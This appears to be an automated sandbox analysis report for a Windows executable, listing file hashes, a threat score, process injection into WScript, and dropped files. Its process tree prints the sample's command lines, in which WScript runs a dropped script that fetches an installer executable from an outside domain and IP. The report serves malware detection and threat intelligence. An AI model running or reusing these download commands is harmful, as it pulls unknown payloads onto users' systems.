9d61c314679e20b6fb1afba69a4f8eb92409ee08f3071170f3a0597f8f47f5f4

Analysis

max time kernel
122s
max time network
128s
platform
windows7_x64
resource
win7-20230712-en
resource tags

arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
submitted
31/08/2023, 16:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f646ada163c46dbd4c59cd52e5bc1c2f_mafia_JC.exe
Size

184KB
MD5

f646ada163c46dbd4c59cd52e5bc1c2f
SHA1

09858f3f5ee8739a738c50f0ba37c9784b49438b
SHA256

9d61c314679e20b6fb1afba69a4f8eb92409ee08f3071170f3a0597f8f47f5f4
SHA512

d40757c84d1f99a8e2cda1c3f7543f5d85cfcab23271d8bdcd173def7b2304d5a7f6e22ab17be68cad178646f7b27f763389e239acdad71fbc8afb5fdb045dbe
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO32:/7BSH8zUB+nGESaaRvoB7FJNndnr

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	1716	WScript.exe
8	1716	WScript.exe
10	1716	WScript.exe
12	2848	WScript.exe
13	2848	WScript.exe
15	2084	WScript.exe
16	2084	WScript.exe
18	2412	WScript.exe
19	2412	WScript.exe
22	1216	WScript.exe
23	1216	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2348 wrote to memory of 1716	2348	f646ada163c46dbd4c59cd52e5bc1c2f_mafia_JC.exe	28
PID 2348 wrote to memory of 1716	2348	f646ada163c46dbd4c59cd52e5bc1c2f_mafia_JC.exe	28
PID 2348 wrote to memory of 1716	2348	f646ada163c46dbd4c59cd52e5bc1c2f_mafia_JC.exe	28
PID 2348 wrote to memory of 1716	2348	f646ada163c46dbd4c59cd52e5bc1c2f_mafia_JC.exe	28
PID 2348 wrote to memory of 2848	2348	f646ada163c46dbd4c59cd52e5bc1c2f_mafia_JC.exe	32
PID 2348 wrote to memory of 2848	2348	f646ada163c46dbd4c59cd52e5bc1c2f_mafia_JC.exe	32
PID 2348 wrote to memory of 2848	2348	f646ada163c46dbd4c59cd52e5bc1c2f_mafia_JC.exe	32
PID 2348 wrote to memory of 2848	2348	f646ada163c46dbd4c59cd52e5bc1c2f_mafia_JC.exe	32
PID 2348 wrote to memory of 2084	2348	f646ada163c46dbd4c59cd52e5bc1c2f_mafia_JC.exe	34
PID 2348 wrote to memory of 2084	2348	f646ada163c46dbd4c59cd52e5bc1c2f_mafia_JC.exe	34
PID 2348 wrote to memory of 2084	2348	f646ada163c46dbd4c59cd52e5bc1c2f_mafia_JC.exe	34
PID 2348 wrote to memory of 2084	2348	f646ada163c46dbd4c59cd52e5bc1c2f_mafia_JC.exe	34
PID 2348 wrote to memory of 2412	2348	f646ada163c46dbd4c59cd52e5bc1c2f_mafia_JC.exe	36
PID 2348 wrote to memory of 2412	2348	f646ada163c46dbd4c59cd52e5bc1c2f_mafia_JC.exe	36
PID 2348 wrote to memory of 2412	2348	f646ada163c46dbd4c59cd52e5bc1c2f_mafia_JC.exe	36
PID 2348 wrote to memory of 2412	2348	f646ada163c46dbd4c59cd52e5bc1c2f_mafia_JC.exe	36
PID 2348 wrote to memory of 1216	2348	f646ada163c46dbd4c59cd52e5bc1c2f_mafia_JC.exe	38
PID 2348 wrote to memory of 1216	2348	f646ada163c46dbd4c59cd52e5bc1c2f_mafia_JC.exe	38
PID 2348 wrote to memory of 1216	2348	f646ada163c46dbd4c59cd52e5bc1c2f_mafia_JC.exe	38
PID 2348 wrote to memory of 1216	2348	f646ada163c46dbd4c59cd52e5bc1c2f_mafia_JC.exe	38

C:\Users\Admin\AppData\Local\Temp\f646ada163c46dbd4c59cd52e5bc1c2f_mafia_JC.exe
"C:\Users\Admin\AppData\Local\Temp\f646ada163c46dbd4c59cd52e5bc1c2f_mafia_JC.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2348
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufCBE7.js" http://www.djapp.info/?domain=fhLHXRAxpF.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=432&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufCBE7.exe
  2⤵
  - Blocklisted process makes network request
  PID:1716
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufCBE7.js" http://www.djapp.info/?domain=fhLHXRAxpF.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=432&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufCBE7.exe
  2⤵
  - Blocklisted process makes network request
  PID:2848
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufCBE7.js" http://www.djapp.info/?domain=fhLHXRAxpF.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=432&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufCBE7.exe
  2⤵
  - Blocklisted process makes network request
  PID:2084
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufCBE7.js" http://www.djapp.info/?domain=fhLHXRAxpF.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=432&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufCBE7.exe
  2⤵
  - Blocklisted process makes network request
  PID:2412
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufCBE7.js" http://www.djapp.info/?domain=fhLHXRAxpF.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=432&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufCBE7.exe
  2⤵
  - Blocklisted process makes network request
  PID:1216

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

Filesize
1KB

MD5
07bb24b589a95f25c8f4204f5585f208

SHA1
63470f432dc54d095812f10c98316808895dfa58

SHA256
9d9014efa6b0ca6d5db26dbf25d0603e5c7ab0e9bc15f4cc95c16fc772d0228f

SHA512
7eec757e7b3e02fe9d99f0e3041109367734544488fc4fd1b41fd3b743d7eaac573daecddd517129dd8c5b922bc619e04ce48c552ac9ecf163f502cfe457ee68

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

Filesize
408B

MD5
37749d03baf09ddca63afe80754fb30a

SHA1
065f28a6cf56949cfefa3a07a8c28cdd734e7533

SHA256
cc418b8fdaef6d055911c3cbf928ae7bdac44dfb2ed47c5f289bb4a6abfd2201

SHA512
af8daac992611f90d451e23d00d53bb415b06379ed7f2a9539b784999f1ad4c05fe0270ab60ae174d29b73b10fdcb47c677df91b29c77f18abd39a2e5d68ca29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\12APMO2Y\domain_profile[1].htm

Filesize
40KB

MD5
cbfe0f8b87d66380ec568de2a2df9aa3

SHA1
522ca9181ae126afb690558446695f906024f1f7

SHA256
3b5cad7ac8e2befeddb78a185f3075a6798473389357bf748ca25c912cab26d8

SHA512
e2f9573383ec3a763a6a4c93ca771932e34fb6b1311e6e2b31e99e0048e92305490a5996c5467ea06e282f3297a5604e1c6fbacd090e8e2924de93a41f3344b6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\12APMO2Y\domain_profile[1].htm

Filesize
40KB

MD5
60a389478f00742f1ffa2acb0952350d

SHA1
00f431c194236010b5ff8a5227c6b347fdfdb78b

SHA256
40c32a127e3f052fbe126168c088d284a4283bdbf2b3302a61a6b775b0e4020e

SHA512
9499fffec58b9326bd87ceb10c9b6e109c3ef43d25d13c38c5b86b9f0c5d3b8242983e6e5f55d7da533bf5df3f8427fcd0b6302c77bf3d8e6f8b5866dbcd7ceb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TGCFYHZ3\domain_profile[1].htm

Filesize
40KB

MD5
356e4375d7ed7d1ffd2d8a8c4a319602

SHA1
839ece14f648db090e29b8254e5cc59c7faf82f7

SHA256
56b34d0635786d8af99375cf796cf6456339da87142920d6b6cc385d8ab2b2d6

SHA512
1fd90df2e8c703c45d10c40085f3314955c37c34cef1e0a85ae3285f12606b38e28d838c87fe486da708894e7b1ec0f475ec5263183e7577a2a4d415ef11c83b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TGCFYHZ3\domain_profile[1].htm

Filesize
40KB

MD5
9edfa32db954bf068ea81e351e2745ce

SHA1
e10ab1219d222b37daf624f6008769c78658e317

SHA256
5463a41bfa68473c7d2b359452d956b6dfdf90dd099907c4105a42a1c2609392

SHA512
9d4048ac6428eb685958c5f28005f5a4708ec9e49627ac1ea4c16c2d85a1207c60b38ba96cd1d62b20f3e8b16d94bd059e380bc58a35d82c8a2e6547082c94f1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TGCFYHZ3\domain_profile[1].htm

Filesize
40KB

MD5
b5e7a2e9b11775ef93a65eb55ee878ce

SHA1
906fa2d7d620ddd4005b0db6e738e69757cca68a

SHA256
7aac69eb95323044260b232f5350f886ec6365d6509acd8f9c62bc14df022ea3

SHA512
573b5a3b80b5322fd3102faab7a38a117e023a79d7e7b42969c5e9f240e86b94c048839f394ff831d29df5254d2f925690c2141dbba7fac3503fca0890bb1b62

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab12F4.tmp

Filesize
62KB

MD5
3ac860860707baaf32469fa7cc7c0192

SHA1
c33c2acdaba0e6fa41fd2f00f186804722477639

SHA256
d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904

SHA512
d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar2B84.tmp

Filesize
164KB

MD5
4ff65ad929cd9a367680e0e5b1c08166

SHA1
c0af0d4396bd1f15c45f39d3b849ba444233b3a2

SHA256
c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6

SHA512
f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27

Download Submit
C:\Users\Admin\AppData\Local\Temp\fufCBE7.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\RPPWNWXZ.txt

Filesize
177B

MD5
b42c483ecb044e4fe8f3c30beea39716

SHA1
3805d3a08893afad0bd3533a668c6af5e28f2d50

SHA256
22d761a43afa74ced7dc8ae221efdc0b8db1bf50795ff601f109ee607f8b0b2f

SHA512
d0be0d558bcb13bc469fbeabb48118ef11927c54394ce613884b1e603462eb66d0d797958690a8fd8f832f99d0bd8a36a7aeaead50cff569a9dd5e47decae625

Download Submit